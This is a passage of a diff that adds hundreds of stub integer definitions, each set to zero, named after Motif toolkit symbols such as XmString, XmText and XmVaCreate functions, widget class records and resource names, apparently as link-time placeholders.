+int _XmSmultiClick = 0;
+int _XmSmultipleSelectionCallback = 0;
+int _XmSmustMatch = 0;
+int _XmSmwmDecorations = 0;
+int _XmSmwmFunctions = 0;
+int _XmSmwmInputMode = 0;
+int _XmSmwmMenu = 0;
+int _XmSmwmMessages = 0;
+int _XmSnavigationType = 0;
+int _XmSneedsMotion = 0;
+int _XmSnoMatchCallback = 0;
+int _XmSnoMatchString = 0;
+int _XmSnoneCursorForeground = 0;
+int _XmSnoResize = 0;
+int _XmSnotifyProc = 0;
+int _XmSnumColumns = 0;
+int _XmSnumDropRectangles = 0;
+int _XmSnumDropTransfers = 0;
+int _XmSnumExportTargets = 0;
+int _XmSnumImportTargets = 0;
+int _XmSnumRectangles = 0;
+int _XmSocorro = 0;
+int _XmSoffsetX = 0;
+int _XmSoffsetY = 0;
+int _XmSokCallback = 0;
+int _XmSokLabelString = 0;
+int _XmSoperationChangedCallback = 0;
+int _XmSoperationCursorIcon = 0;
+int _XmSoptionLabel = 0;
+int _XmSoptionMnemonic = 0;
+int _XmSortResourceList = 0;
+int _XmSosfActivate = 0;
+int _XmSosfAddMode = 0;
+int _XmSosfBackSpace = 0;
+int _XmSosfBeginLine = 0;
+int _XmSosfCancel = 0;
+int _XmSosfClear = 0;
+int _XmSosfCopy = 0;
+int _XmSosfCut = 0;
+int _XmSosfDelete = 0;
+int _XmSosfDown = 0;
+int _XmSosfEndLine = 0;
+int _XmSosfHelp = 0;
+int _XmSosfInsert = 0;
+int _XmSosfLeft = 0;
+int _XmSosfMenu = 0;
+int _XmSosfMenuBar = 0;
+int _XmSosfPageDown = 0;
+int _XmSosfPageLeft = 0;
+int _XmSosfPageRight = 0;
+int _XmSosfPageUp = 0;
+int _XmSosfPaste = 0;
+int _XmSosfPrimaryPaste = 0;
+int _XmSosfQuickPaste = 0;
+int _XmSosfRight = 0;
+int _XmSosfSelect = 0;
+int _XmSosfUndo = 0;
+int _XmSosfUp = 0;
+int _XmSoutputCreate = 0;
+int _XmSpacking = 0;
+int _XmSpageDecrementCallback = 0;
+int _XmSpageIncrement = 0;
+int _XmSpageIncrementCallback = 0;
+int _XmSpaneMaximum = 0;
+int _XmSpaneMinimum = 0;
+int _XmSpattern = 0;
+int _XmSpendingDelete = 0;
+int _XmSpinB_defaultAccelerators = 0;
+int _XmSpinB_defaultTranslations = 0;
+int xmSpinBoxClassRec = 0;
+int XmSpinBoxValidatePosition = 0;
+int xmSpinBoxWidgetClass = 0;
+int _XmSpopupEnabled = 0;
+int _XmSpositionIndex = 0;
+int _XmSpostFromButton = 0;
+int _XmSpostFromCount = 0;
+int _XmSpostFromList = 0;
+int _XmSpreeditType = 0;
+int _XmSprocessingDirection = 0;
+int _XmSpromptString = 0;
+int _XmSprotocolCallback = 0;
+int _XmSpushButton = 0;
+int _XmSpushButtonEnabled = 0;
+int _XmSqualifySearchDataProc = 0;
+int _XmSradioAlwaysOne = 0;
+int _XmSradioBehavior = 0;
+int _XmSradioButton = 0;
+int _XmSrealizeCallback = 0;
+int _XmSrecomputeSize = 0;
+int _XmSrectangles = 0;
+int _XmSrefigureMode = 0;
+int _XmSrepeatDelay = 0;
+int _XmSresizable = 0;
+int _XmSresizeCallback = 0;
+int _XmSresizeHeight = 0;
+int _XmSresizePolicy = 0;
+int _XmSresizeWidth = 0;
+int _XmSrightAttachment = 0;
+int _XmSrightOffset = 0;
+int _XmSrightPosition = 0;
+int _XmSrightWidget = 0;
+int _XmSrowColumnType = 0;
+int _XmSrows = 0;
+int _XmSrubberPositioning = 0;
+int _XmSsashHeight = 0;
+int _XmSsashIndent = 0;
+int _XmSsashShadowThickness = 0;
+int _XmSsashWidth = 0;
+int _XmSscaleHeight = 0;
+int _XmSscaleMultiple = 0;
+int _XmSscaleWidth = 0;
+int _XmSscrollBarDisplayPolicy = 0;
+int _XmSscrollBarPlacement = 0;
+int _XmSscrolledWindowMarginHeight = 0;
+int _XmSscrolledWindowMarginWidth = 0;
+int _XmSscrollHorizontal = 0;
+int _XmSscrollingPolicy = 0;
+int _XmSscrollLeftSide = 0;
+int _XmSscrollTopSide = 0;
+int _XmSscrollVertical = 0;
+int _XmSselectColor = 0;
+int _XmSselectedItemCount = 0;
+int _XmSselectedItems = 0;
+int _XmSselectInsensitivePixmap = 0;
+int _XmSselectionArrayCount = 0;
+int _XmSselectionLabelString = 0;
+int _XmSselectionPolicy = 0;
+int _XmSselectPixmap = 0;
+int _XmSselectThreshold = 0;
+int _XmSseparator = 0;
+int _XmSseparatorOn = 0;
+int _XmSseparatorType = 0;
+int _XmSset = 0;
+int _XmSshadow = 0;
+int _XmSshadowThickness = 0;
+int _XmSshadowType = 0;
+int _XmSshellUnitType = 0;
+int _XmSshowArrows = 0;
+int _XmSshowAsDefault = 0;
+int _XmSshowSeparator = 0;
+int _XmSshowValue = 0;
+int _XmSsimpleCallback = 0;
+int _XmSsingleSelectionCallback = 0;
+int _XmSsingleSeparator = 0;
+int _XmSsizePolicy = 0;
+int _XmSskipAdjust = 0;
+int _XmSsliderSize = 0;
+int _XmSsource = 0;
+int _XmSsourceCursorIcon = 0;
+int _XmSsourceIsExternal = 0;
+int _XmSsourcePixmapIcon = 0;
+int _XmSsourceWidget = 0;
+int _XmSsourceWindow = 0;
+int _XmSspacing = 0;
+int _XmSstartTime = 0;
+int _XmSstateCursorIcon = 0;
+int _XmSstringDirection = 0;
+int _XmSsubMenuId = 0;
+int _XmSsymbolPixmap = 0;
+int _XmStackFree = 0;
+int _XmStackInit = 0;
+int _XmStackPop = 0;
+int _XmStackPush = 0;
+int xm_std_constraint_filter = 0;
+int xm_std_filter = 0;
+int _XmStearOffMenuActivateCallback = 0;
+int _XmStearOffMenuDeactivateCallback = 0;
+int _XmStearOffModel = 0;
+int _XmStextAccelerators = 0;
+int _XmStextColumns = 0;
+int _XmStextFontList = 0;
+int _XmStextString = 0;
+int _XmStextTranslations = 0;
+int _XmStextValue = 0;
+int _XmStitleString = 0;
+int _XmStoBottomCallback = 0;
+int _XmStopAttachment = 0;
+int _XmStopCharacter = 0;
+int _XmStopItemPosition = 0;
+int _XmStopLevelEnterCallback = 0;
+int _XmStopLevelLeaveCallback = 0;
+int _XmStopOffset = 0;
+int _XmStoPositionCallback = 0;
+int _XmStopPosition = 0;
+int _XmStopShadowColor = 0;
+int _XmStopShadowPixmap = 0;
+int _XmStopWidget = 0;
+int _XmStoTopCallback = 0;
+int _XmStransferProc = 0;
+int _XmStransferStatus = 0;
+int _XmStraversalCallback = 0;
+int _XmStraversalOn = 0;
+int _XmStraversalType = 0;
+int _XmStraverseObscuredCallback = 0;
+int _XmStreeUpdateProc = 0;
+int _XmStringBaseline = 0;
+int XmStringBaseline = 0;
+int _XmStringByteCompare = 0;
+int XmStringByteCompare = 0;
+int XmStringByteStreamLength = 0;
+int _XmStringCacheFree = 0;
+int _XmStringCacheGet = 0;
+int _XmStringCacheTag = 0;
+int _XmStringCharacterCount = 0;
+int XmStringCompare = 0;
+int XmStringComponentCreate = 0;
+int XmStringConcat = 0;
+int XmStringConcatAndFree = 0;
+int _XmStringContextCopy = 0;
+int _XmStringContextFree = 0;
+int _XmStringContextReInit = 0;
+int _XmStringCopy = 0;
+int XmStringCopy = 0;
+int _XmStringCreate = 0;
+int XmStringCreate = 0;
+int _XmStringCreateExternal = 0;
+int XmStringCreateFontList = 0;
+int XmStringCreateFontList_r = 0;
+int XmStringCreateLocalized = 0;
+int XmStringCreateLtoR = 0;
+int XmStringCreateSimple = 0;
+int XmStringDirectionCreate = 0;
+int XmStringDirectionToDirection = 0;
+int _XmStringDraw = 0;
+int XmStringDraw = 0;
+int _XmStringDrawImage = 0;
+int XmStringDrawImage = 0;
+int _XmStringDrawLining = 0;
+int _XmStringDrawMnemonic = 0;
+int _XmStringDrawSegment = 0;
+int _XmStringDrawUnderline = 0;
+int XmStringDrawUnderline = 0;
+int _XmStringEmpty = 0;
+int XmStringEmpty = 0;
+int _XmStringEntryCopy = 0;
+int _XmStringEntryFree = 0;
+int _XmStringExtent = 0;
+int XmStringExtent = 0;
+int _XmStringFree = 0;
+int XmStringFree = 0;
+int _XmStringFreeContext = 0;
+int XmStringFreeContext = 0;
+int XmStringGenerate = 0;
+int _XmStringGetBaselines = 0;
+int _XmStringGetCurrentCharset = 0;
+int XmStringGetLtoR = 0;
+int XmStringGetNextComponent = 0;
+int _XmStringGetNextSegment = 0;
+int XmStringGetNextSegment = 0;
+int _XmStringGetNextTabWidth = 0;
+int XmStringGetNextTriple = 0;
+int _XmStringGetSegment = 0;
+int _XmStringGetTextConcat = 0;
+int _XmStringHasSubstring = 0;
+int XmStringHasSubstring = 0;
+int _XmStringHeight = 0;
+int XmStringHeight = 0;
+int _XmStringIndexCacheTag = 0;
+int _XmStringIndexGetTag = 0;
+int _XmStringInitContext = 0;
+int XmStringInitContext = 0;
+int _XmStringIsCurrentCharset = 0;
+int XmStringIsVoid = 0;
+int _XmStringIsXmString = 0;
+int _XmStringLayout = 0;
+int XmStringLength = 0;
+int _XmStringLineCount = 0;
+int XmStringLineCount = 0;
+int XmStringLtoRCreate = 0;
+int XmStringNConcat = 0;
+int XmStringNCopy = 0;
+int _XmStringNCreate = 0;
+int _XmStringOptToNonOpt = 0;
+int XmStringParseText = 0;
+int XmStringPeekNextComponent = 0;
+int XmStringPeekNextTriple = 0;
+int XmStringPutRendition = 0;
+int _XmStringRender = 0;
+int _XmStrings = 0;
+int _XmStrings22 = 0;
+int _XmStrings23 = 0;
+int _XmStringsAreEqual = 0;
+int XmStringSegmentCreate = 0;
+int _XmStringSegmentExtents = 0;
+int _XmStringSegmentNew = 0;
+int XmStringSeparatorCreate = 0;
+int _XmStringsI = 0;
+int _XmStringSingleSegment = 0;
+int _XmStringSourceCreate = 0;
+int _XmStringSourceDestroy = 0;
+int _XmStringSourceFindString = 0;
+int _XmStringSourceGetEditable = 0;
+int _XmStringSourceGetMaxLength = 0;
+int _XmStringSourceGetPending = 0;
+int _XmStringSourceGetString = 0;
+int _XmStringSourceGetValue = 0;
+int _XmStringSourceHasSelection = 0;
+int _XmStringSourceSetEditable = 0;
+int _XmStringSourceSetGappedBuffer = 0;
+int _XmStringSourceSetMaxLength = 0;
+int _XmStringSourceSetPending = 0;
+int _XmStringSourceSetValue = 0;
+int XmStringTableParseStringArray = 0;
+int XmStringTableProposeTablist = 0;
+int XmStringTableToXmString = 0;
+int XmStringTableUnparse = 0;
+int XmStringToXmStringTable = 0;
+int _XmStringTruncateASN1 = 0;
+int _XmStringUngenerate = 0;
+int XmStringUnparse = 0;
+int _XmStringUpdate = 0;
+int _XmStringUpdateWMShellTitle = 0;
+int _XmStringWidth = 0;
+int XmStringWidth = 0;
+int _XmStroughColor = 0;
+int _XmSunitType = 0;
+int _XmSunmapCallback = 0;
+int _XmSunpostBehavior = 0;
+int _XmSunselectPixmap = 0;
+int _XmSupdateSliderSize = 0;
+int _XmSuseAsyncGeometry = 0;
+int _XmSuserData = 0;
+int _XmSvalidCursorForeground = 0;
+int _XmSvalueChangedCallback = 0;
+int _XmSvalueWcs = 0;
+int _XmSverifyBell = 0;
+int _XmSverticalFontUnit = 0;
+int _XmSverticalScrollBar = 0;
+int _XmSverticalSpacing = 0;
+int _XmSvisibleItemCount = 0;
+int _XmSvisibleWhenOff = 0;
+int _XmSvisualPolicy = 0;
+int _XmSWGetClipArea = 0;
+int _XmSwhichButton = 0;
+int _XmSWNotifyGeoChange = 0;
+int _XmSwordWrap = 0;
+int _XmSworkWindow = 0;
+int _XmSyncDropSiteTree = 0;
+int XmTabAttributesFree = 0;
+int XmTabbedStackListAppend = 0;
+int _XmTabbedStackListArray = 0;
+int XmTabbedStackListCompare = 0;
+int XmTabbedStackListCopy = 0;
+int _XmTabbedStackListCount = 0;
+int XmTabbedStackListCreate = 0;
+int XmTabbedStackListFind = 0;
+int XmTabbedStackListFree = 0;
+int _XmTabbedStackListGet = 0;
+int XmTabbedStackListInsert = 0;
+int XmTabbedStackListModify = 0;
+int XmTabbedStackListQuery = 0;
+int XmTabbedStackListRemove = 0;
+int XmTabbedStackListSimpleAppend = 0;
+int XmTabbedStackListSimpleInsert = 0;
+int XmTabbedStackListSimpleModify = 0;
+int XmTabbedStackListSimpleQuery = 0;
+int XmTabbedStackListSimpleRemove = 0;
+int _XmTabBoxCanvas = 0;
+int xmTabBoxClassRec = 0;
+int XmTabBoxGetIndex = 0;
+int _XmTabBoxGetMaxTabHeight = 0;
+int _XmTabBoxGetMaxTabWidth = 0;
+int XmTabBoxGetNumColumns = 0;
+int XmTabBoxGetNumRows = 0;
+int _XmTabBoxGetNumRowsColumns = 0;
+int XmTabBoxGetNumTabs = 0;
+int _XmTabBoxGetTabHeight = 0;
+int XmTabBoxGetTabRow = 0;
+int _XmTabBoxGetTabWidth = 0;
+int _XmTabBoxSelectTab = 0;
+int _XmTabBoxStackedGeometry = 0;
+int xmTabBoxWidgetClass = 0;
+int XmTabBoxXYToIndex = 0;
+int xmTabCanvasClassRec = 0;
+int xmTabCanvasWidgetClass = 0;
+int _XmTabCopy = 0;
+int XmTabCreate = 0;
+int XmTabFree = 0;
+int XmTabGetValues = 0;
+int _XmTabListAdd = 0;
+int XmTabListCopy = 0;
+int _XmTabListDelete = 0;
+int XmTabListFree = 0;
+int _XmTabListGetPosition = 0;
+int XmTabListGetTab = 0;
+int XmTabListInsertTabs = 0;
+int XmTabListRemoveTabs = 0;
+int XmTabListReplacePositions = 0;
+int XmTabListTabCount = 0;
+int XmTabSetValue = 0;
+int xmTabStackClassRec = 0;
+int XmTabStackGetSelectedTab = 0;
+int XmTabStackIndexToWidget = 0;
+int XmTabStackSelectTab = 0;
+int xmTabStackWidgetClass = 0;
+int XmTargetsAreCompatible = 0;
+int _XmTargetsToIndex = 0;
+int _XmTearOffB_overrideTranslations = 0;
+int _XmTearOffBPrimClassExtRec = 0;
+int _XmTearOffBtnDownEventHandler = 0;
+int _XmTearOffBtnUpEventHandler = 0;
+int xmTearOffButtonClassRec = 0;
+int xmTearOffButtonWidgetClass = 0;
+int _XmTearOffInitiate = 0;
+int _XmTestTraversability = 0;
+int _XmTextAdjustGC = 0;
+int _XmTextBytesToCharacters = 0;
+int _XmTextChangeBlinkBehavior = 0;
+int _XmTextChangeHOffset = 0;
+int _XmTextChangeVOffset = 0;
+int _XmTextCharactersToBytes = 0;
+int xmTextClassRec = 0;
+int _XmTextClearDestination = 0;
+int XmTextClearSelection = 0;
+int _XmTextConvert = 0;
+int XmTextCopy = 0;
+int XmTextCopyLink = 0;
+int _XmTextCountCharacters = 0;
+int XmTextCut = 0;
+int _XmTextDestinationVisible = 0;
+int _XmTextDisableRedisplay = 0;
+int XmTextDisableRedisplay = 0;
+int _XmTextDrawDestination = 0;
+int _XmTextEnableRedisplay = 0;
+int XmTextEnableRedisplay = 0;
+int _XmTextEventBindings1 = 0;
+int _XmTextEventBindings2 = 0;
+int _XmTextEventBindings3 = 0;
+int _XmTextF_EventBindings1 = 0;
+int _XmTextF_EventBindings2 = 0;
+int _XmTextF_EventBindings3 = 0;
+int xmTextFieldClassRec = 0;
+int XmTextFieldClearSelection = 0;
+int _XmTextFieldConvert = 0;
+int XmTextFieldCopy = 0;
+int XmTextFieldCopyLink = 0;
+int _XmTextFieldCountBytes = 0;
+int _XmTextFieldCountCharacters = 0;
+int XmTextFieldCut = 0;
+int _XmTextFieldDeselectSelection = 0;
+int _XmTextFieldDestinationVisible = 0;
+int _XmTextFieldDrawInsertionPoint = 0;
+int XmTextFieldGetAddMode = 0;
+int XmTextFieldGetBaseline = 0;
+int XmTextFieldGetBaseLine = 0;
+int XmTextFieldGetCursorPosition = 0;
+int _XmTextFieldGetDropReciever = 0;
+int XmTextFieldGetEditable = 0;
+int XmTextFieldGetInsertionPosition = 0;
+int XmTextFieldGetLastPosition = 0;
+int XmTextFieldGetMaxLength = 0;
+int XmTextFieldGetSelection = 0;
+int XmTextFieldGetSelectionPosition = 0;
+int XmTextFieldGetSelectionWcs = 0;
+int XmTextFieldGetString = 0;
+int XmTextFieldGetStringWcs = 0;
+int XmTextFieldGetSubstring = 0;
+int XmTextFieldGetSubstringWcs = 0;
+int _XmTextFieldHandleSecondaryFinished = 0;
+int XmTextFieldInsert = 0;
+int XmTextFieldInsertWcs = 0;
+int _XmTextFieldInstallTransferTrait = 0;
+int _XmTextFieldLoseSelection = 0;
+int XmTextFieldPaste = 0;
+int XmTextFieldPasteLink = 0;
+int XmTextFieldPosToXY = 0;
+int XmTextFieldRemove = 0;
+int XmTextFieldReplace = 0;
+int _XmTextFieldReplaceText = 0;
+int XmTextFieldReplaceWcs = 0;
+int XmTextFieldSetAddMode = 0;
+int _XmTextFieldSetClipRect = 0;
+int _XmTextFieldSetCursorPosition = 0;
+int XmTextFieldSetCursorPosition = 0;
+int _XmTextFieldSetDestination = 0;
+int XmTextFieldSetEditable = 0;
+int XmTextFieldSetHighlight = 0;
+int XmTextFieldSetInsertionPosition = 0;
+int XmTextFieldSetMaxLength = 0;
+int _XmTextFieldSetSel2 = 0;
+int XmTextFieldSetSelection = 0;
+int XmTextFieldSetString = 0;
+int XmTextFieldSetStringWcs = 0;
+int XmTextFieldShowPosition = 0;
+int _XmTextFieldStartSelection = 0;
+int xmTextFieldWidgetClass = 0;
+int XmTextFieldXYToPos = 0;
+int _XmTextFindLineEnd = 0;
+int _XmTextFindScroll = 0;
+int XmTextFindString = 0;
+int _XmTextFindStringBackwards = 0;
+int _XmTextFindStringForwards = 0;
+int XmTextFindStringWcs = 0;
+int _XmTextFPrimClassExtRec = 0;
+int _XmTextFreeContextData = 0;
+int _XmTextFToggleCursorGC = 0;
+int XmTextGetAddMode = 0;
+int _XmTextGetAnchor = 0;
+int XmTextGetBaseline = 0;
+int _XmTextGetBaseLine = 0;
+int XmTextGetBaseLine = 0;
+int _XmTextGetBaselines = 0;
+int XmTextGetCenterline = 0;
+int XmTextGetCursorPosition = 0;
+int _XmTextGetDisplayRect = 0;
+int _XmTextGetDropReciever = 0;
+int XmTextGetEditable = 0;
+int XmTextGetInsertionPosition = 0;
+int XmTextGetLastPosition = 0;
+int _XmTextGetLineTable = 0;
+int XmTextGetMaxLength = 0;
+int _XmTextGetNumberLines = 0;
+int _XmTextGetSel2 = 0;
+int XmTextGetSelection = 0;
+int XmTextGetSelectionPosition = 0;
+int XmTextGetSelectionWcs = 0;
+int XmTextGetSource = 0;
+int XmTextGetString = 0;
+int XmTextGetStringWcs = 0;
+int XmTextGetSubstring = 0;
+int XmTextGetSubstringWcs = 0;
+int _XmTextGetTableIndex = 0;
+int XmTextGetTopCharacter = 0;
+int _XmTextGetTotalLines = 0;
+int _XmTextHandleSecondaryFinished = 0;
+int _XmTextHasDestination = 0;
+int _XmTextInputCreate = 0;
+int _XmTextInputGetSecResData = 0;
+int XmTextInsert = 0;
+int XmTextInsertWcs = 0;
+int _XmTextInstallTransferTrait = 0;
+int _XmTextInvalidate = 0;
+int _XmTextIn_XmTextEventBindings1 = 0;
+int _XmTextIn_XmTextEventBindings2 = 0;
+int _XmTextIn_XmTextEventBindings3 = 0;
+int _XmTextIn_XmTextVEventBindings = 0;
+int _XmTextLineInfo = 0;
+int _XmTextLoseSelection = 0;
+int _XmTextMarginsProc = 0;
+int _XmTextMarkRedraw = 0;
+int _XmTextModifyVerify = 0;
+int _XmTextMovingCursorPosition = 0;
+int _XmTextNeedsPendingDeleteDis = 0;
+int _XmTextNumLines = 0;
+int _XmTextOutLoadGCsAndRecolorCursors = 0;
+int _XmTextOutputCreate = 0;
+int _XmTextOutputGetSecResData = 0;
+int XmTextPaste = 0;
+int XmTextPasteLink = 0;
+int _XmTextPosToLine = 0;
+int XmTextPosToXY = 0;
+int _XmTextPrimClassExtRec = 0;
+int _XmTextRealignLineTable = 0;
+int XmTextRemove = 0;
+int _XmTextReplace = 0;
+int XmTextReplace = 0;
+int XmTextReplaceWcs = 0;
+int _XmTextResetClipOrigin = 0;
+int _XmTextResetIC = 0;
+int XmTextScroll = 0;
+int _XmTextScrollable = 0;
+int XmTextSetAddMode = 0;
+int _XmTextSetCursorPosition = 0;
+int XmTextSetCursorPosition = 0;
+int _XmTextSetDestinationSelection = 0;
+int _XmTextSetEditable = 0;
+int XmTextSetEditable = 0;
+int _XmTextSetHighlight = 0;
+int XmTextSetHighlight = 0;
+int XmTextSetInsertionPosition = 0;
+int XmTextSetMaxLength = 0;
+int _XmTextSetPreeditPosition = 0;
+int _XmTextSetSel2 = 0;
+int XmTextSetSelection = 0;
+int XmTextSetSource = 0;
+int XmTextSetString = 0;
+int XmTextSetStringWcs = 0;
+int _XmTextSetTopCharacter = 0;
+int XmTextSetTopCharacter = 0;
+int _XmTextShouldWordWrap = 0;
+int _XmTextShowPosition = 0;
+int XmTextShowPosition = 0;
+int _XmTextToggleCursorGC = 0;
+int _XmTextToLocaleText = 0;
+int _XmTextUpdateLineTable = 0;
+int _XmTextValidate = 0;
+int _XmTextValueChanged = 0;
+int xmTextWidgetClass = 0;
+int XmTextXYToPos = 0;
+int _XmToggleBCacheCompare = 0;
+int _XmToggleB_defaultTranslations = 0;
+int _XmToggleBGadClassExtRec = 0;
+int _XmToggleB_menuTranslations = 0;
+int _XmToggleBPrimClassExtRec = 0;
+int xmToggleButtonClassRec = 0;
+int xmToggleButtonGadgetClass = 0;
+int xmToggleButtonGadgetClassRec = 0;
+int XmToggleButtonGadgetGetState = 0;
+int XmToggleButtonGadgetSetState = 0;
+int XmToggleButtonGadgetSetValue = 0;
+int xmToggleButtonGCacheObjClassRec = 0;
+int XmToggleButtonGetState = 0;
+int XmToggleButtonSetState = 0;
+int XmToggleButtonSetValue = 0;
+int xmToggleButtonWidgetClass = 0;
+int _XmToHorizontalPixels = 0;
+int _XmToLayoutDirection = 0;
+int _XmToolTipEnter = 0;
+int XmToolTipGetLabel = 0;
+int _XmToolTipLeave = 0;
+int _XmToolTipRemove = 0;
+int _XmToPanedPixels = 0;
+int _XmTopShadowColorDefault = 0;
+int _XmTopShadowPixmapDefault = 0;
+int _XmToVerticalPixels = 0;
+int XmTrackingEvent = 0;
+int XmTrackingLocate = 0;
+int _XmTrackShellFocus = 0;
+int XmTransferDone = 0;
+int _XmTransferGetDestinationCBStruct = 0;
+int XmTransferSendRequest = 0;
+int XmTransferSetParameters = 0;
+int XmTransferStartRequest = 0;
+int XmTransferValue = 0;
+int _XmTransformSubResources = 0;
+int XmTranslateKey = 0;
+int _XmTraverse = 0;
+int _XmTraverseAway = 0;
+int _XmTraverseDown = 0;
+int _XmTraverseHome = 0;
+int _XmTraverseLeft = 0;
+int _XmTraverseNext = 0;
+int _XmTraverseNextTabGroup = 0;
+int _XmTraversePrev = 0;
+int _XmTraversePrevTabGroup = 0;
+int _XmTraverseRight = 0;
+int _XmTraverseUp = 0;
+int _XmTravGraphAdd = 0;
+int _XmTravGraphRemove = 0;
+int _XmTravGraphUpdate = 0;
+int xmTreeClassRec = 0;
+int xmTreeWidgetClass = 0;
+int XmuNCopyISOLatin1Lowered = 0;
+int _XmUnhighlightBorder = 0;
+int XmUninstallImage = 0;
+int _XmUnitTypeDefault = 0;
+int XmUpdateDisplay = 0;
+int _XmUseColorObj = 0;
+int xmUseVersion = 0;
+int _XmUtf8ToUcs2 = 0;
+int _XmUtilIsSubclassByNameQ = 0;
+int XmVaCreateArrowButton = 0;
+int XmVaCreateArrowButtonGadget = 0;
+int XmVaCreateBulletinBoard = 0;
+int XmVaCreateButtonBox = 0;
+int XmVaCreateCascadeButton = 0;
+int XmVaCreateCascadeButtonGadget = 0;
+int XmVaCreateColorSelector = 0;
+int XmVaCreateColumn = 0;
+int XmVaCreateCombinationBox2 = 0;
+int XmVaCreateComboBox = 0;
+int XmVaCreateCommand = 0;
+int XmVaCreateContainer = 0;
+int XmVaCreateDataField = 0;
+int XmVaCreateDrawingArea = 0;
+int XmVaCreateDrawnButton = 0;
+int XmVaCreateDropDown = 0;
+int XmVaCreateExt18List = 0;
+int XmVaCreateFileSelectionBox = 0;
+int XmVaCreateForm = 0;
+int XmVaCreateFrame = 0;
+int XmVaCreateIconGadget = 0;
+int XmVaCreateLabel = 0;
+int XmVaCreateLabelGadget = 0;
+int XmVaCreateList = 0;
+int XmVaCreateMainWindow = 0;
+int XmVaCreateManagedArrowButton = 0;
+int XmVaCreateManagedArrowButtonGadget = 0;
+int XmVaCreateManagedBulletinBoard = 0;
+int XmVaCreateManagedButtonBox = 0;
+int XmVaCreateManagedCascadeButton = 0;
+int XmVaCreateManagedCascadeButtonGadget = 0;
+int XmVaCreateManagedColorSelector = 0;
+int XmVaCreateManagedColumn = 0;
+int XmVaCreateManagedCombinationBox2 = 0;
+int XmVaCreateManagedComboBox = 0;
+int XmVaCreateManagedCommand = 0;
+int XmVaCreateManagedContainer = 0;
+int XmVaCreateManagedDataField = 0;
+int XmVaCreateManagedDrawingArea = 0;
+int XmVaCreateManagedDrawnButton = 0;
+int XmVaCreateManagedDropDown = 0;
+int XmVaCreateManagedExt18List = 0;
+int XmVaCreateManagedFileSelectionBox = 0;
+int XmVaCreateManagedForm = 0;
+int XmVaCreateManagedFrame = 0;
+int XmVaCreateManagedIconGadget = 0;
+int XmVaCreateManagedLabel = 0;
+int XmVaCreateManagedLabelGadget = 0;
+int XmVaCreateManagedList = 0;
+int XmVaCreateManagedMainWindow = 0;
+int XmVaCreateManagedMessageBox = 0;
+int XmVaCreateManagedMultiList = 0;
+int XmVaCreateManagedNotebook = 0;
+int XmVaCreateManagedPanedWindow = 0;
+int XmVaCreateManagedPushButton = 0;
+int XmVaCreateManagedPushButtonGadget = 0;
+int XmVaCreateManagedRowColumn = 0;
+int XmVaCreateManagedScale = 0;
+int XmVaCreateManagedScrollBar = 0;
+int XmVaCreateManagedScrolledWindow = 0;
+int XmVaCreateManagedSelectionBox = 0;
+int XmVaCreateManagedSeparator = 0;
+int XmVaCreateManagedSeparatorGadget = 0;
+int XmVaCreateManagedSimpleSpinBox = 0;
+int XmVaCreateManagedSpinBox = 0;
+int XmVaCreateManagedTabStack = 0;
+int XmVaCreateManagedText = 0;
+int XmVaCreateManagedTextField = 0;
+int XmVaCreateManagedToggleButton = 0;
+int XmVaCreateManagedToggleButtonGadget = 0;
+int XmVaCreateMessageBox = 0;
+int XmVaCreateMultiList = 0;
+int XmVaCreateNotebook = 0;
+int XmVaCreatePanedWindow = 0;
+int XmVaCreatePushButton = 0;
+int XmVaCreatePushButtonGadget = 0;
+int XmVaCreateRowColumn = 0;
+int XmVaCreateScale = 0;
+int XmVaCreateScrollBar = 0;
+int XmVaCreateScrolledWindow = 0;
+int XmVaCreateSelectionBox = 0;
+int XmVaCreateSeparator = 0;
+int XmVaCreateSeparatorGadget = 0;
+int XmVaCreateSimpleCheckBox = 0;
+int XmVaCreateSimpleMenuBar = 0;
+int XmVaCreateSimpleOptionMenu = 0;
+int XmVaCreateSimplePopupMenu = 0;
+int XmVaCreateSimplePulldownMenu = 0;
+int XmVaCreateSimpleRadioBox = 0;
+int XmVaCreateSimpleSpinBox = 0;
+int XmVaCreateSpinBox = 0;
+int XmVaCreateTabStack = 0;
+int XmVaCreateText = 0;
+int XmVaCreateTextField = 0;
+int XmVaCreateToggleButton = 0;
+int XmVaCreateToggleButtonGadget = 0;
+int _XmValidateFocus = 0;
+int _XmValidCursorIconQuark = 0;
+int _XmValidTimestamp = 0;
+int _XmVaToTypedArgList = 0;
+int _XmVendorExtRealize = 0;
+int xmVendorShellExtClassRec = 0;
+int xmVendorShellExtObjectClass = 0;
+int _XmVersionString = 0;
+int _XmVirtKeys_acornFallbackBindingString = 0;
+int _XmVirtKeys_apolloFallbackBindingString = 0;
+int _XmVirtKeys_dblclkFallbackBindingString = 0;
+int _XmVirtKeys_decFallbackBindingString = 0;
+int _XmVirtKeysDestroy = 0;
+int _XmVirtKeys_dgFallbackBindingString = 0;
+int _XmVirtKeys_fallbackBindingString = 0;
+int _XmVirtKeysHandler = 0;
+int _XmVirtKeys_hpFallbackBindingString = 0;
+int _XmVirtKeys_ibmFallbackBindingString = 0;
+int _XmVirtKeys_ingrFallbackBindingString = 0;
+int _XmVirtKeysInitialize = 0;
+int _XmVirtKeysLoadFallbackBindings = 0;
+int _XmVirtKeysLoadFileBindings = 0;
+int _XmVirtKeys_megatekFallbackBindingString = 0;
+int _XmVirtKeys_motorolaFallbackBindingString = 0;
+int _XmVirtKeys_sgiFallbackBindingString = 0;
+int _XmVirtKeys_siemens9733FallbackBindingString = 0;
+int _XmVirtKeys_siemensWx200FallbackBindingString = 0;
+int _XmVirtKeys_sunFallbackBindingString = 0;
+int _XmVirtKeys_tekFallbackBindingString = 0;
+int _XmVirtualToActualKeysym = 0;
+int _XmWarning = 0;
+int _XmWarningMsg = 0;
+int _XmWhitePixel = 0;
+int _XmWidgetFocusChange = 0;
+int XmWidgetGetBaselines = 0;
+int XmWidgetGetDisplayRect = 0;
+int _XmWidgetIsTraversable = 0;
+int xmWorldClass = 0;
+int xmWorldClassRec = 0;
+int xmWorldObjectClass = 0;
+int _XmWriteDragBuffer = 0;
+int _XmWriteDSToStream = 0;
+int _XmWriteInitiatorInfo = 0;
+int _XmXftDrawCreate = 0;
+int _XmXftDrawDestroy = 0;
+int _XmXftDrawString = 0;
+int _XmXftDrawString2 = 0;
+int _XmXftFontAverageWidth = 0;
+int _XmXftGetXftColor = 0;
+int _XmXftSetClipRectangles = 0;
+int _Xmxpmatoui = 0;
+int _XmxpmColorKeys = 0;
+int _XmxpmCreateImageFromPixmap = 0;
+int _XmxpmCreatePixmapFromImage = 0;
+int _XmxpmDataTypes = 0;
+int _XmxpmFreeColorTable = 0;
+int _XmxpmFreeRgbNames = 0;
+int _XmxpmGetCmt = 0;
